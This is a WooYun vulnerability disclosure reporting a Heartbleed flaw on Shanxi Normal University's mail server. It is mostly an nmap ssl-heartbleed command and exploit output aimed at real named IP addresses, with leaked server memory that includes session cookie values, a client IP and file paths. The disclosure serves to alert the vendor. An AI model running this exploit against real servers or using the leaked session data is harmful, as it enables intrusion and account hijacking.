当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107260

漏洞标题:山西师范大学邮件系统心脏滴血漏洞

相关厂商:山西师范大学

漏洞作者: my强哥

提交时间:2015-04-14 10:34

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

山西师范大学邮件系统存在心脏滴血漏洞,泄露部分敏感信息,只测试了漏洞存在,没有深入。

详细说明:

nmap -n -p 443 -Pn --script=ssl-heartbleed 202.207.160.203
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-11 11:25 CST
Nmap scan report for 202.207.160.203
Host is up (0.27s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| Description:
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 2.49 seconds

漏洞证明:

nmap -n -p 443 -Pn --script=ssl-heartbleed 202.207.160.203
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-11 11:25 CST
Nmap scan report for 202.207.160.203
Host is up (0.27s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| Description:
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 2.49 seconds
[*] 202.207.160.204:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 552823a316234a13b4cee491d77bc56adfcce2cf03061fbfd44ab4e0efa1c38b
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 7ac185e8f0e782acd013405092828d6c91744039bf788b5b1b006b1ce2f4d045
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 770
[!] Handshake #1:
[!] Length: 766
[!] Type: Certificate Data (11)
[!] Certificates length: 763
[!] Data length: 766
[!] Certificate #1:
[!] Certificate #1: Length: 760
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005d8ff68>, issuer=#<OpenSSL::X509::Name:0x00000005d8fef0>, serial=#<OpenSSL::BN:0x00000005d8fe50>, not_before=2012-11-01 07:46:36 UTC, not_after=2022-10-30 07:46:36 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 202.207.160.204:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 552823ae2d6c83eced7242995ea169752b0f174ddada883892bd09921dddacc3
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 6860b581a37bfd38b1b1e069e10e03dd8ced19769e36356637d00fa445414ea5
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 770
[!] Handshake #1:
[!] Length: 766
[!] Type: Certificate Data (11)
[!] Certificates length: 763
[!] Data length: 766
[!] Certificate #1:
[!] Certificate #1: Length: 760
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005780168>, issuer=#<OpenSSL::X509::Name:0x0000000577fee8>, serial=#<OpenSSL::BN:0x0000000577fd08>, not_before=2012-11-01 07:46:36 UTC, not_after=2022-10-30 07:46:36 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 202.207.160.204:443 - Sending Heartbeat...
[*] 202.207.160.204:443 - Heartbeat response, 19595 bytes
[+] 202.207.160.204:443 - Heartbeat response with leak
[*] 202.207.160.204:443 - Printable info leaked: U',m.w%zZt+yf"!98532ED/A}"S0RXe=_*?8ZQ1jF[AIabU6>E|5u#ygwODCO+2M&.vl=2Er|zxNtsBaq7p/onmlk]jHhrgsf%ed8c@\!Y3XWVTSP`LKJIDA^?G;Y<7654-&1.-,:)'%[$>"!~ 9NJ<@i'}/LUhyxt*fcZTRPK+i:943,)I86p"?l-A:f=="down"?l+A:l][f=="left"?n-h:f=="right"?n+h:n]}catch(y){return false}if(!v||a.$==v)return false;e[f=="up"||f=="left"?"unshift":"push"](new CKEDITOR.dom.element(v))}for(var f=a.getDocument(),x=l,A=v=0,C=!c&&new CKEDITOR.dom.documentFragment(f),D=0,f=0;f<e.length;f++){h=e[f];var F=h.getParent(),E=h.getFirst(),K=h.$.colSpan,I=h.$.rowSpan,F=F.$.rowIndex,G=d(i,F,h),D=D+K*I,A=Math.max(A,G-n+K);v=Math.max(v,F-l+I);if(!c){K=h;(I=K.getBogus())&&I.remove();K.trim();if(h.getChildren().count()){if(F!=x&&E&&(!E.isBlockBoundary||!E.isBlockBoundary({br:1})))(x=C.getLast(CKEDITOR.dom.walker.whitespaces(true)))&&(!x.is||!x.is("br"))&&C.append("br");h.moveChildren(C)}f?h.remove():h.setHtml("")}x=F}if(c)return v*A==D;C.moveChildren(a);CKEDITOR.env.ie||a.appendBogus();A>=k?a.removeAttribute("rowSpan"):a.$.rowSpan=v;v>=j?a.removeAttribute("colSpan"):a.$.colSpan=A;c=new CKEDITOR.dom.nodeList(g.$.rows);e=c.count();for(f=e-1;f>=0;f--){g=c.getItem(f);if(!g.$.cells.length){g.remove();e++}}return a}function k(a,f){var c=b(a);if(c.length>1)return false;if(f)return true;var c=c[0],e=c.getParent(),g=e.getAscendant("table"),h=CKEDITOR.tools.buildTableMap(g),i=e.$.rowIndex,j=d(h,i,c),k=c.$.rowSpan,l;if(k>1){l=Math.ceil(k/2);for(var k=Math.floor(k/2),e=i+l,g=new CKEDITOR.dom.element(g.$.rows[e]),h=d(h,e),n,e=c.clone(),i=0;i<h.length;i++){n=h[i];if(n.parentNode==g.$&&i>j){e.insertBefore(new CKEDITOR.dom.element(n));break}else n=null}n||g.append(e,true)}else{k=l=1;g=e.clone();g.insertAfter(e);g.append(e=c.clone());n=d(h,i);for(j=0;j<n.length;j++)n[j].rowSpan++}CKEDITOR.env.ie||e.appendBogus();c.$.rowSpan=l;e.$.rowSpan=k;l==1&&c.removeAttribute("rowSpan");k==1&&e.removeAttribute("rowSpan");return e}function l(a,f){var c=b(a);if(c.length>1)return false;if(f)return true;var c=c[0],e=c.getParent(),g=e.getAscendant("table"),g=CKEDITOR.tools.buildTableMap(g),h=d(g,e.$.rowIndex,c),i=c.$.colSpan;if(i>1){e=Math.ceil(i/2);i=Math.floor(i/2)}else{for(var i=e=1,j=[],k=0;k<g.length;k++){var l=g[k];j.push(l[h]);l[h].rowSpan>1&&(k=k+(l[h].rowSpan-1))}for(g=0;g<j.length;g++)j[g].colSpan++}g=c.clone();g.insertAfter(c);CKEDITOR.env.ie||g.appendBogus();c.$.colSpan=e;g.$.colSpan=i;e==1&&c.removeAttribute("colSpan");i==1&&g.removeAttribute("colSpan");return g}var n=/^(?:td|th)$/;CKEDITOR.plugins.tabletools={requires:"table,dialog,contextmenu",init:function(d){function e(a){return CKEDITOR.tools.extend(a||{},{contextSensitive:1,refresh:function(a,b){this.setState(b.contains({td:1,th:1},1)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED)}})}var n=d.lang.table;d.addCommand("cellProperties",new CKEDITOR.dialogCommand("cellProperties",e()));CKEDITOR.dialog.add("cellProperties",this.path+"dialogs/tableCell.js");d.addCommand("rowDelete",e({exec:function(b){b=b.getSelection();g(a(b))}}));d.addCommand("rowInsertBefore",e({exec:function(a){a=a.getSelection();c(a,true)}}));d.addCommand("rowInsertAfter",e({exec:function(a){a=a.getSelection();c(a)}}));d.addCommand("columnDelete",e({exec:function(a){for(var a=a.getSelection(),a=b(a),f=a[0],d=a[a.length-1],a=f.getAscendant("table"),c=CKEDITOR.tools.buildTableMap(a),e,h,i=[],j=0,k=c.length;j<k;j++)for(var l=0,m=c[j].length;l<m;l++){c[j][l]==f.$&&(e=l);c[j][l]==d.$&&(h=l)}for(j=e;j<=h;j++)for(l=0;l<c.length;l++){d=c[l];f=new CKEDITOR.dom.element(a.$.rows[l]);d=new CKEDITOR.dom.element(d[j]);if(d.$){d.$.colSpan==1?d.remove():d.$.colSpan=d.$.colSpan-1;l=l+(d.$.rowSpan-1);f.$.cells.length||i.push(f)}}h=a.$.rows[0]&&a.$.rows[0].cells;e=new CKEDITOR.dom.element(h[e]||(e?h[e-1]:a.$.parentNode));i.length==k&&a.remove();e&&g(e,true)}}));d.addCommand("columnInsertBefore",e({exec:function(a){a=a.getSelection();h(a,true)}}));d.addCommand("columnInsertAfter",e({exec:function(a){a=a.getSelection();h(a)}}));d.addCommand("cellDelete",e({exec:function(a){a=a.getSelection();f(a)}}));d.addCommand("cellMerge",e({exec:function(a){g(j(a.getSelection()),true)}}));d.addCommand("cellMergeRight",e({exec:function(a){g(j(a.getSelection(),"right"),true)}}));d.addCommand("cellMergeDown",e({exec:function(a){g(j(a.getSelection(),"down"),true)}}));d.addCommand("cellVerticalSplit",e({exec:function(a){g(k(a.getSelection()))}}));d.addCommand("cellHorizontalSplit",e({exec:function(a){g(l(a.getSelection()))}}));d.addCommand("cellInsertBefore",e({exec:function(a){a=a.getSelection();i(a,true)}}));d.addCommand("cellInsertAfter",e({exec:function(a){a=a.getSelection();i(a)}}));d.addMenuItems&&d.addMenuItems({tablecell:{label:n.cell.menu,group:"tablecell",order:1,getItems:function(){var a=d.getSelection(),f=b(a);return{tablecell_insertBefore:CKEDITOR.TRISTATE_OFF,tablecell_insertAfter:CKEDITOR.TRISTATE_OFF,tablecell_delete:CKEDITOR.TRISTATE_OFF,tablecell_merge:j(a,null,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_merge_right:j(a,"right",true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_merge_down:j(a,"down",true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_split_vertical:k(a,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_split_horizontal:l(a,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_properties:f.length>0?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED}}},tablecell_insertBefore:{label:n.cell.insertBefore,group:"tablecell",command:"cellInsertBefore",order:5},tablecell_insertAfter:{label:n.cell.insertAfter,group:"tablecell",command:"cellInsertAfter",order:10},tablecell_delete:{label:n.cell.deleteCell,group:"tablecell",command:"cellDelete",order:15},tablecell_merge:{label:n.cell.merge,group:"tablecell",command:"cellMerge",order:16},tablecell_merge_right:{label:n.cell.mergeRight,group:"tablecell",command:"cellMergeRight",order:17},tablecell_merge_down:{label:n.cell.mergeDown,group:"tablecell",command:"cellMergeDown",order:18},tablecell_split_horizontal:{label:n.cell.splitHorizontal,group:"tablecell",command:"cellHorizontalSplit",order:19},tablecell_split_vertical:{label:n.cell.splitVertical,group:"tablecell",command:"cellVerticalSplit",order:20},tablecell_properties:{label:n.cell.title,group:"tablecellproperties",command:"cellProperties",order:21},tablerow:{label:n.row.menu,group:"tablerow",order:1,getItems:function(){return{tablerow_insertBefore:CKEDITOR.TRISTATE_OFF,tablerow_insertAfter:CKEDITOR.TRISTATE_OFF,tablerow_delete:CKEDITOR.TRISTATE_OFF}}},tablerow_insertBefore:{label:n.row.insertBefore,group:"tablerow",command:"rowInsertBefore",order:5},tablerow_insertAfter:{label:n.row.insertAfter,group:"tablerow",command:"rowInsertAfter",order:10},tablerow_delete:{label:n.row.deleteRow,group:"tablerow",command:"rowDelete",order:15},tablecolumn:{label:n.column.menu,group:"tablecolumn",order:1,getItems:function(){return{tablecolumn_insertBefore:CKEDITOR.TRISTATE_OFF,tablecolumn_insertAfter:CKEDITOR.TRISTATE_OFF,tablecolumn_delete:CKEDITOR.TRISTATE_OFF}}},tablecolumn_insertBefore:{label:n.column.insertBefore,group:"tablecolumn",command:"columnInsertBefore",order:5},tablecolumn_insertAfter:{label:n.column.insertAfter,group:"tablecolumn",command:"columnInsertAfter",order:10},tablecolumn_delete:{label:n.column.deleteColumn,group:"tablecolumn",command:"columnDelete",order:15}});d.contextMenu&&d.contextMenu.addListener(function(a,b,f){return(a=f.contains({td:1,th:1},1))&&!a.isReadOnly()?{tablecell:CKEDITOR.TRISTATE_OFF,tablerow:CKEDITOR.TRISTATE_OFF,tablecolumn:CKEDITOR.TRISTATE_OFF}:null})},getSelectedCells:b};CKEDITOR.plugins.add("tabletools",CKEDITOR.plugins.tabletools)}(),CKEDITOR.tools.buildTableMap=function(b){for(var b=b.$.rows,c=-1,a=[],e=0;e<b.length;e++){c++;!a[c]&&(a[c]=[]);for(var h=-1,i=0;i<b[e].cells.length;i++){var f=b[e].cells[i];for(h++;a[c][h];)h++;for(var g=isNaN(f.colSpan)?1:f.colSpan,f=isNaN(f.rowSpan)?1:f.rowSpan,d=0;d<f;d++){a[c+d]||(a[c+d]=[]);for(var j=0;j<g;j++)a[c+d][h+j]=b[e].cells[i]}h=h+(g-1)}}return a},function(){CKEDITOR.plugins.add("templates",{requires:"dialog",init:function(a){CKEDITOR.dialog.add("templates",CKEDITOR.getUrl(this.path+"dialogs/templates.js"));a.addCommand("templates",new CKEDITOR.dialogCommand("templates"));a.ui.addButton&&a.ui.addButton("Templates",{label:a.lang.templates.button,command:"templates",toolbar:"doctools,10"})}});var b={},c={};CKEDITOR.addTemplates=function(a,c){b[a]=c};CKEDITOR.getTemplates=function(a){return b[a]};CKEDITOR.loadTemplates=function(a,b){for(var h=[],i=0,f=a.length;i<f;i++)if(!c[a[i]]){h.push(a[i]);c[a[i]]=1}h.length?CKEDITOR.scriptLoader.load(h,b):setTimeout(b,0)}}(),CKEDITOR.config.templates_files=[CKEDITOR.getUrl("plugins/templates/templates/default.js")],CKEDITOR.config.templates_replaceContent=!0,function(){function b(a){function b(){for(var d=f(),i=CKEDITOR.tools.clone(a.config.toolbarGroups)||c(a),l=0;l<i.length;l++){var n=i[l];if(n!="/"){typeof n=="string"&&(n=i[l]={name:n});var m,o=n.groups;if(o)for(var q=0;q<o.length;q++){m=o[q];(m=d[m])&&e(n,m)}(m=d[n.name])&&e(n,m)}}return i}function f(){var b={},f,d,c;for(f in a.ui.items){d=a.ui.items[f];c=d.toolbar||"others";c=c.split(",");d=c[0];c=parseInt(c[1]||-1,10);b[d]||(b[d]=[]);b[d].push({name:f,order:c})}for(d in b)b[d]=b[d].sort(function(a,b){return a.order==b.order?0:b.order<0?-1:a.order<0?1:a.order<b.order?-1:1});return b}function e(a,b){if(b.length){a.items?a.items.push("-"):a.items=[];for(var f;f=b.shift();)a.items.push(f.name)}}var d=a.config.toolbar;typeof d=="string"&&(d=a.config["toolbar_"+d]);return a.toolbar=d||b()}function c(a){return a._.toolbarGroups||(a._.toolbarGroups=[{name:"document",groups:["mode","document","doctools"]},{name:"clipboard",groups:["clipboard","undo"]},{name:"editing",groups:["find","selection","spellchecker"]},{name:"forms"},"/",{name:"basicstyles",groups:["basicstyles","cleanup"]},{name:"paragraph",groups:["list","indent","blocks","align"]},{name:"links"},{name:"insert"},"/",{name:"styles"},{name:"colors"},{name:"tools"},{name:"others"},{name:"about"}])}var a=function(){this.toolbars=[];this.focusCommandExecuted=false};a.prototype.focus=function(){for(var a=0,b;b=this.toolbars[a++];)for(var f=0,c;c=b.items[f++];)if(c.focus){c.focus();return}};var e={modes:{wysi+pLal1/js/settings.js?v=8.1.0.3 HTTP/1.1Host 202.207.160.204Connection keep-aliveUser-Agent Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36Accept */*Referer http://202.207.160.204/?q=login.load_cacheAccept-Encoding gzip,deflate,sdchAccept-Language en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie EMPHPSID=su8dqsbaomh5vi59chp57oscp0; empos=09pLpLabR`^X~ Yr Yr T ZZ\@4N*pOgN@0NNW~NNWNgNW'ZObOW-@gO*pOWx$OOW}/O#OWd@O,OWn-help{background-position:-48px -144px}.ui-icon-check{background-position:-64px -144px}.ui-icon-bullet{background-position:-80px -144px}.ui-icon-radio-off{background-position:-96px -144px}.ui-icon-radio-on{background-position:-112px -144px}.ui-icon-pin-w{background-position:-128px -144p|Vi-ichostconnectionuser-agentacceptrefereraccept-encodingaccept-languagecookieionX4XXN'/user/tpl1/js/settings.jsjsgw/usr/local/eyou/mail/web/tpl/user/tpl1/js/settings.js.jsYX<G<GDY5X<GRFri, 18 Mar 2016 19:23:41 GMT max-age=315360006000application/javascriptrip]`^$Z\\]<Gr_<GoZT_\\Z\HTTP/1.1 200 OKServer: nginx/1.2.5Date: Thu, 19 Mar 2015 19:23:41 GMTContent-Type: application/javascriptLast-Modified: Mon, 28 Jan 2013 15:55:16 GMTTransfer-Encoding: chunkedConnection: keep-aliveExpires: Fri, 18 Mar 2016 19:23:41 GMTCache-Control: max-age=31536000Content-Encoding: gzip^_\RM%10Ybb<GbM%DYb\\\\\@a%\\\\\\\\\\"@a%\]]22"2@a%H]"X]P]BB2B@a%]2]]RRBR@a%]B]]bbRb@a%^R$^^rrbr@a%X^bh^D_((((@a%^(a%a%\\]X]$_],_]4_^<_\\$^\_h^_l_ `____@]%48e6]_L]_d_H H @]%l_8`@`]_X]`]`]`^`$^h^(`_0`H H @]%]\]t`X]|`]`@``115.24.32.192 - - [20/Mar/2015:03:23:41 +0800] 200 "GET /tpl/user/tpl1/js/settings.js?v=8.1.0.3 HTTP/1.1" 47365 "http://202.207.160.204/?q=login.load_cache" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" "-"34p567'&'%#$"543210/.-,+*)('&%$pL)" class="del_file"></a>';tdNode=trNode.insertCell(-1);tdNode.innerHTML='<a href="javascript:enjoy()" title="'+L("delete")+'" onclick="'+__this.__thisName+".delSmsFilter('send', false, '"+v.smsnotify_filter_id+'\');" class ="change_file"></a>'});trNode=tableNode.insertRow(-1);trN@ode.style.height="28px";trNode.id="send_sms_filter_tr_buttom"+__this.__moduleExt;tdNode=trNode.insertCell(-1);tdNode.innerHTML='&nbsp;&nbsp;<input name="i" id="send_sms_filter_all'+__this.__moduleExt+'" type="checkbox" value="0" onclick="return '+__this.__thisName+".checkBoxBlur('sms_filter', 1, 'tb_sms_filter_send', 'send_sms_filter_all', 'smsnotify_filter_id[]', this);\"/>";tdNode=trNode.insertCell(-1);tdNode.innerHTML=L("select all");tdNode=trNode.insertCell(-1);tdNode.colSpan="4";tdNode.align="right";tdNode.innerHTML='<input name="send_sms_filter_del" id="send_sms_filter_del'+__this.__moduleExt+'" type="button" onclick="'+__this.__thisName+".delSmsFilter('send', true, '');\" value=\""+L("button delete")+'" class="btn" />';gMessage.hideMessageTop();__this.setSettingsSize()};this._drawUnsendSmsFilter=function(unsendData){$("#tb_sms_filter_unsend"+__this.__moduleExt).empty();var tableNode=g("tb_sms_filter_unsend"+__this.__moduleExt);var trNode,tdNode;trNode=tableNode.insertRow(-1);trNode.className="t_head";trNode.id="unsend_sms_filter_tr_head"+__this.__moduleExt;tdNode=trNode.insertCell(-1);tdNode.width="25";tdNode.innerHTML='&nbsp;&nbsp;<input id="head_unsend_sms_filter_all'+__this.__moduleExt+'" type="checkbox" name="" onclick="'+__this.__thisName+".checkBoxBlur('sms_filter', 1, 'tb_sms_filter_unsend', 'unsend_sms_filter_all', 'smsnotify_filter_id[]', this);\" value=\"\" />";tdNode=trNode.insertCell(-1);tdNode.width="25%";tdNode.innerHTML="<strong>"+L("keywords")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.width="25%";tdNode.innerHTML="<strong>"+L("filter scope")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.widht="28%";tdNode.id="operate_action"+__this.__moduleExt;tdNode.innerHTML="<strong>"+L("filter keywords")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.width="10%";tdNode.className="cen";tdNode.innerHTML=L("modify");tdNode=trNode.insertCell(-1);tdNode.width="7%";tdNode.className="cen";tdNode.innerHTML=L("delete");$.each(unsendData,function(k,v){__this.smsFiterList[v.smsnotify_filter_id]=v;var scopeInt=v.scope-0;var scopeHtml=[];if(v.match_type==2){scopeHtml.push(L("the sender"))}else{if(scopeInt==1){scopeHtml.push(L("mail subject"))}else{if(scopeInt==2){scopeHtml.push(L("message body"))}else{scopeHtml.push(L("mail subject"));scopeHtml.push(L("message body"))}}}scopeHtml=scopeHtml.join(" | ");if(v.match_algo==0){var algo=L("not contain the keyword")}else{var algo=L("contain the keyword")}trNode=tableNode.insertRow(-1);trNode.id="tr_unsend_sms_filter"+v.smsnotify_filter_id+__this.__moduleExt;trNode.className="";tdNode=trNode.insertCell(-1);tdNode.innerHTML='&nbsp;&nbsp;<input name="smsnotify_filter_id[]" class="folder_ids" id="input_unsend_sms_filter'+v.smsnotify_filter_id+__this.__moduleExt+'" value="'+v.smsnotify_filter_id+'" type="checkbox" onclick="'+__this.__thisName+".checkBoxBlur('sms_filter', 0, 'tb_sms_filter_unsend', 'unsend_sms_filter_all', 'smsnotify_filter_id[]', this);\" />";tdNode=trNode.insertCell(-1);tdNode.innerHTML=htmlSpecialChars(v.keywords);tdNode.title=v.keywords;tdNode=trNode.insertCell(-1);tdNode.title=scopeHtml;tdNode.innerHTML=scopeHtml;tdNode=trNode.insertCell(-1);tdNode.title=algo;tdNode.innerHTML=algo;td
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

修复方案:

升级

版权声明:转载请注明来源 my强哥@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-20 14:22

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论